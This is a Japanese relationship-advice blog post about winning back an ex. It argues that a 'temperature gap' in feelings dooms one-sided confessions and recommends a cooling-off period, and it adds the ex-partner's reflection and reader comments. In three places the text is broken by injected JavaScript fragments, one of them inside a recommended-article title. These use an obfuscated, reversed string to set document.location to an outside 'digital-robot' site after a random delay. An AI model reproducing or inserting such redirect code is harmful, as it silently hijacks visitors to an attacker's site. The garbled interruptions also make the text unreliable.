恋愛心理学を知らなきゃ復縁は不可能!※復縁できないNG行動はコレ

この記事は6分で読めます

このページでは、

自力復縁に成功した当サイトの管理人“復縁ドッグ”が

当サイトを運営する中で、読者さんからいただいた、

相談メールを読んで、感じたことを書いています。

 

復縁の、基礎的な考え方、恋愛心理学を、お伝えするページとなっております。

 

復縁に成功する為に、必要なことだけ書いていますので、

復縁希望者さんは、是非参考にしてください。

復縁ドッグの10年間に渡る、復縁日記はこちら→

 

では、はじめていきましょう。

 

 

毎日、私を頼って、たくさんのメールを送っていただき、

本当に、ありがたいと思っています。

感謝ヽ(´∀`*)ノ感激ヽ(;´Д`)ノ

雨ヽ(@´з`@)ノ 嵐♪

 

 

私がはじめて、恋愛という、恋愛をしたのは、

中学1年生の頃でした。

 

実は、このはじめての恋愛で、はじめての彼女ができました。

しかし、これまた、はじめての彼女で、はじめての失恋を経験し、

ここで、はじめて復縁をしたいと思ったのです。

 

ここから、私の復縁人生が、はじまったのです。

とまあ、この話は、また別の機会にするとして・・・。

 

 

 

まず、質問をいただく中で、一番多く感じることを、

例を使って説明していきたいと思います。

ヾ(・∀・`o)ネェネェ

 

 

この話は、恋愛心理学、復縁をする上で、基本中の基本的なことですが、

非常に大事なことですので、必ず、頭に叩き込んでおいてください。

 

これは、とある高校生のエピソード(フィクション)です。

あなたが主人公になってつもりで、お読み下さい。

 

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

今、あなたは高校生です。

ここでは、高校一年生の男子という設定にしましょう。

 

あなたは、通学の為に、電車を利用しています。

 

 

毎朝、あなたは、同じ駅で、ある女性に目を釘付けにされています。

そうです、あなたは、ある女性に、一目惚れをしてしまったのです。

好(?´∀`?)き

 

しかし、相手の女性は、あなたの存在には、全く気が付いていません。

同じ電車の、同じ車両に乗っている、ただの高校生。

 

満員電車の中では、相手の顔を満足に見れない状態。

でも、時折、見える相手の顔を見るたびに、

あなたの心は、トキメキます。

ドッキ(*♥д♥*)ーン!!

 

 

あなた

「今日も朝から、彼女に会えて幸せだったな~♪」

(●´3`)ノ愛してる♥

 

そんな毎朝を過ごすうちに、あっという間に、数ヶ月が過ぎていきました。

 

はじめは、見ているだけで、毎朝、幸せな気分だったのですが、

あなたは、段々、自分の気持ちを、押さえることが出来なくなってきたのです。

 

 

 

あなた

「一度でいいから話がしたい・・・。」

「一緒に出かけて、一緒に笑いたい・・・。」

「自分の気持ちを、伝えたい・・・。」

「付き合いたい・・・。」

 

 

 

日に日に、自分の気持ちが膨らんでいくのに、

あなたは、気が付きます。

.・ヾ(。 ̄□ ̄)ツ ギャァ!!

でも、見ず知らずの自分なんて、彼女に相手にされるはずもありません。

 

無理やり、自分の気持ちを、押さえつける日々。

見ているだけで、幸せなんだと、自分に言い聞かせる日々。

(´-ω-`)う~ん

 

 

しかし、そんな自分の気持ちとは裏腹に、

彼女への想いだけは、膨らんでいくのでした。

 

 

 

そして、あなたは決意するのです。

 

 

 

もう自分の気持ちにウソはつけない!

思い切って、告白しよう!!

 

 

 

 

そして、ついに、彼女が電車を下りたその時、

彼女に声をかけたのです。

 

そして、あなたはこう言いました。

 

 

 

 

「ずっと、あなたのことが好きでした。」

「付き合ってください・・・。」

ヽ(愛´∀`愛)ノスキデシター

 

 

 

 

結果は、どうだったと思いますか?

 

そうですよね。

残念ながら、この高校生は振られてしまいました。

ガ━━(´・д・`|||●)━━ン

 

 

 

この例で、復縁ドッグは、何を言いたかったのか、

分かりますか?

 

なぜ、この高校生は、振られてしまったのでしょうか?

少し時間をとって、考えてみてください。

(m。_。)m オネガイシマス

 

これは、一見、復縁とは関係なさそうに思えますが、

実は、この物語は、復縁にとって、非常に大事なこと

あなたに、お伝えしようとしているのです。

 

 

どうですか?

 

 

何かピンと来たでしょうか?

 

 

そろそろ、答えを発表していきますよ。

 

 

では、答えを発表していきます。

 

 

 

その答えは、『温度差』です。

 

 

 

これだけでは、まだ、何を言っているのか分からないと思いますので、

今から、順を追って、説明していきます。

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

この高校生は、彼女のことを毎日見ていますので、

彼女のことを、段々、好きになっていきました。

 

 

このことは、この高校生の温度が段々、

高く、熱くなっていったことを意味しています。

 

 

しかし、彼女の方は、どうでしょうか?

 

この高校生の存在に、気が付いていない為、

彼への温度は、上がるはずもありません。

 

ここで、すでに温度に差が、出てしまっているのです。

 

 

 

恋愛では、この温度差が、非常に重要となってきます。

 

自分の気持ち=温度が、相手の温度よりも、高すぎると

恋愛は成立しません。

 

 

 

仮に、先ほどの例で、上手くいとしたら、

相当、男子高校生のスタイルや顔が、芸能人レベルで、

しかも、この彼女が、彼氏を、見た目だけで判断する人でなければ、

上手くいかないでしょう。

 

だって、彼女は、この高校生とはじめてあったのですから、

高校生と、付き合うかどうかの判断材料は“見た目”しかないのですから・・・

 

 

 

話を戻します。

 

 

 

復縁は、どうしても、自分の温度が高い状態で

別れを切り出されてしまっていますので、

自分の恋愛温度が、相手よりも、かなり高い状態の人が多いのです。

 

復縁も恋愛なのです。

 

自分の温度が、異常に高い時に、自分の思いを一方的に

相手に伝える行為は、電車でしか接点がない女性に、

いきなり、告白するようなものなのです。

 

 

 

 

復縁は、なまじ一度付き合ったことがあるだけに、

自分の感情を、容易に相手に伝えられてしまいます。

 

 

 

 

私自身も、この温度差には、散々苦しめられてきました。

ですから、復縁希望者さんの、今の熱は、痛いほど分かります。

 

しかし、残念ながら、相手の熱は、低い状態なのです。

 

 

 

ですから、まずは、しっかりと冷却期間を取ることが大事だと思います。

 

この冷却期間をとることによって、冷静になれ、

自分の温度を、少し下げるとこができ、別れの際に、

相手に与えてしまった、マイナスのイメージを取り払うことで、

相手の温度を、上げることができるのです。

 

 

 

間違っても、先ほどの高校生のように、

爆発しそうな、感情の押し付けだけは、やめてください。

 

この行為は、自分の感情をスっキリしたいという、

自己満足な、エゴイズム的な行為です。

 

これは、相手のことを想うといった感情とは

かけ離れている行為ですので、復縁から、あたなを

遠ざけしまうでしょう。

 

それによって、復縁までの道のりは、遠のいてしまいますので、

必ず、守るようにしてください。

 

 

以上が、温度差の話でした。

 

この記事を読んだ、愛の感想です↓

温度差について、復縁ドッグは語っていますが、

当時、冷めた状態の私に対して、

復縁ドッグは、結構アピールをしてきました。

 

復縁を迫れる度に、

 

私が勇気を出して伝えた別れたいという気持ちが無視されているようで、

この人には、何を言っても伝わらないと思うようになった気がします。

 

私が、他の人に目移りして別れを切り出したので、

はじめは、申し訳ない気持ちでいっぱいだったのですが、

段々、もう別れたのだから、連絡をしないで欲しい。

 

連絡自体がうっとうしく思うようになりました。(ごめんなさい(> <))

メールや電話などでのアプローチは、もちろんですが、

切手がない手紙がポストに投函されていたこともありました。

 

私の家と、復縁ドッグの家は、車で30分くらいかかるのですが、

わざわざ、家まで来たんだと思うと、少し引きました。

 

これも、温度差を意識していれば、防げた行動だったと思います。

 

内容も、私の気持ちを無視した、

復縁ドッグの淋しい気持ちをつづったものだったので、

温度差は、より開いていったと思います。

 

別れを切り出されてからは、

冷却期間をとったほうが、

自分の感情をぶつけることもなくなると思います。

 

温度差を少なくするために、

元カノ、元彼以外にも、何か、熱中できるものを探したり、

資格取得に頑張ってみたり、

 

その方が、元カノ、元彼の目にも、魅力的に映るのではないかと思いました。

 



 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

1年2カ月復縁ドッグ復縁体験談
復縁失敗体験から学ぶ復縁講座
復縁ドッグによる復縁基礎講座
復縁結婚カップル対談
おすすめ復縁マニュアル

  • このエントリーをはてなブックマークに追加

関連記事

コメント

  1. 愛さん、こんにちは。
    愛さんの話、そのまま自分の彼女の気持ちを聞かされているようでした。
    とても参考になりました。貴重なお話をありがとうございました。

    • りか

    温度差って怖いですね。

    私は別れようと言われて、数日後に別れると伝えるつもりです。

    治すとこ直してまた付き合えばいいと、謎な言葉を残されてます。正直どうすれば……。

    別れるとは伝えるけど、
    どんなふうにいえばいいかわからないんです。
    もっとさみしがらなかったら一緒にいれたのかも、ごめん。って言うのは良くないですかね。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

おすすめ記事

  1. infodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topで【小澤7step】復縁マニュアルを実際に購入してみた

復縁オンライン講座